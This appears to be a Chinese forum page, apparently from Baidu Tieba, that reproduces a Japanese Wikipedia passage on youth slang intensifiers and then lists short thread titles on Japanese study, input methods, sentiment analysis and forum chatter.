转自维基百科 若者言叶 强调として用いるもの 超 「超特急」などと同じ意味の「超」であり、「かなり」「本当に」などの强意を表すのに使用される接头语である。通常は汉字で表记する。一般的には「超気持ちいい」「超面白い(面白え)」などの形容词、「超感动した」「超寝た」のような「超+(动词)」との组み合わせで使用される。「超最悪」のように、悪い意味の强调にも使われる。この用法では本来の「○○を超える」という意味合いはほとんどない。例えば、この用法で「超平凡」と言ったら「非凡」という意味ではなく、「极めて平凡である」の意味である。「バリ」「鬼」等の言い回しもある。 めっちゃ めちゃくちゃ(灭茶苦茶・灭茶灭茶)の転で、「めっちゃかわいいやん」のように使用される副词。転じて「めっさ」や「もっさ」、また「无茶苦茶」の転で「むっちゃ」や「むちゃ」ともいう。もとは大阪の若年层から広まった関西地方の若者言叶である。しかし、関西出身芸人のメディアでの使用などによって全国的に知られる表现となり、全国放送のテレビ番组名に使用されたり(「めちゃ×2イケてるッ!」)、2000年に神奈川県出身の田岛宁子が「めっちゃ悔しい!!」と発言して流行语になったりした。 普通に 强调の意味合いで用いる。もう1つの用法として、「普通に大きい」や「普通に凄い」などのように使う。特别な意味づけや解釈、见方をするには及ばず、常识的に、「普通に」考えてという意味合いである。「いや、普通にそうですよ」(あなたにとってはそれは普通とは思えないかもしれませんが)など。 パネェ 「半端じゃない」→「半端じゃねぇ」→「半端ねぇ」→「パネェ」と変化した、强意を表すのに使用される语である。「パネェくらい好き」といえば「ものすごく好き」という意味である。 神 宗教としての意味合いはない。常识や想定を超える感动を与えるカリスマという意味で使われる。ネットスラングから転用されたもの。 ドカ食い ある机会に普段以上に大量に食べること。大食いと类似するが、大食いは日常的にたくさん食べることをいう。古くから「どか雪」と一度に极めて多い积雪を表现し、「多い」や「大きい」に代わる强调のことば。「どかべん」とも通じる。 ガン见 视线を外さずにある程度の时间、じっと见ること。「がんを飞ばす」とはまた违ったニュアンスの言叶。どちらかと言うと「凝视」の意味に似ている。これとは逆に、意识をしているかどうかにかかわらず、一瞬チラッと见ることをその名の通りチラ见という。爱犬が饵を待つ时など、じっと见る、赤ちゃんがお母さんを、じっと见る等、见つめる様を言う。 情绪的な表现 キモい 「気持ち悪い」が短缩されたもの。「キモい」や「キモイ」と表记される。直接的に対象を「気持ち悪い」と言うよりも若干軽いニュアンスで用いられる。「きめぇ」や「キモス」とも。ヘンタイよいこ新闻1980年11月号では、投稿者が「これは方言ですか?それとも、我が家だけで通用している言叶ですか?」と「キモい」という言叶を使用している。 类义语に「きしょい」があるが、これは「気色悪い」が転じたものである。「キモい」や「キモイ」とほぼ同义。 マジ 「真面目」の転であるが、一般的に「本当に〜」や「本気で〜」と、强调または真実性の表现として用いられる。古くは、江戸时代の洒落本『にやんの事だ』(1781年)「気の毒そふなかほ付にてまじになり」にみられる。この例は名词であるが、现在は真実性・厳密性を表现する:副词としての用法が多い。汉字として「本気」の字を当てることもある。例としては「マジビビった」「マジムカついた」「それマジで?」など。最后の例のマジは名词で、「それは本当(真実)?」の意である。近年はガチンコを略した「ガチ」も同意语で使われる。
我也问个问题 最近发现日本人を+可能型、それはなんで?
本人新做好了一个维文的联想输入法,有意者l留联系方式! rt
就当娱乐,问大家一点意见。大家觉得怎么样? 输入文本感情解析,可以应用到哪些方面? 举个例子,可以用来统计用户对某应用或网站的评价,并通过解析这些数据来达到统计用户评价的自动化。(具体步骤可能是,创建词库,对评价进行分词,根据词性分词,词缀和词根的分解,创建解析系统,通过设计好的某种算法得出结果) 对于其应用方面,还有什么看法么?
建个微信的日语群聊小组算不算打广告?想建一个 RT
由于我快升级了,所以随便发两帖
不知道合不合规矩,发板砖。要的来拿 虽然不知道有多少板砖,不过感觉很厉害 <!--http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhackarmoury.com%2Ftools--&urlrefer=cf4a72d24b582aad93aeae432c3a355a>
恩,看到这个我的碎了
我觉着吧,吧里有点冷清 能不能想个啥办法呢。
Mysql注入小结:
过来看看,那些我认识的人 在黑客吧呆了那么长时间,还是觉得这里亲切 呵呵! 大家还是那么有激情,那么地热情 几年前的某一天账号被盗号了,所以大家都认不出来了吧! 向所有我认识的人问个好!挺怀念的! Headshoter 尊笔
1
下一页